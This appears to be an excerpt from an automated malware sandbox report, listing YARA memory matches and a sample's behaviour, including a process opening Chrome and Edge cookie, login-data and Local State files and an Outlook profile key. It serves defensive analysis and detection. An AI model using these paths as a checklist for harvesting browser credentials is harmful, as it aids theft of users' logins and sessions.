Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match File source: 0000000D.00000002.3363239692.0000000000A90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.3363165345.0000000000A50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.3362865159.0000000000F00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.3362030943.0000000000390000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2770587848.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2786483516.0000000020E40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.3363499558.00000000039B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\icacls.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\icacls.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\icacls.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
Source: C:\Windows\SysWOW64\icacls.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\icacls.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\icacls.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\icacls.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\icacls.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\icacls.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Remote Access Functionality

Source: Yara match File source: 0000000D.00000002.3363239692.0000000000A90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.3363165345.0000000000A50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.3362865159.0000000000F00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.3362030943.0000000000390000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2770587848.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2786483516.0000000020E40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.3363499558.00000000039B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY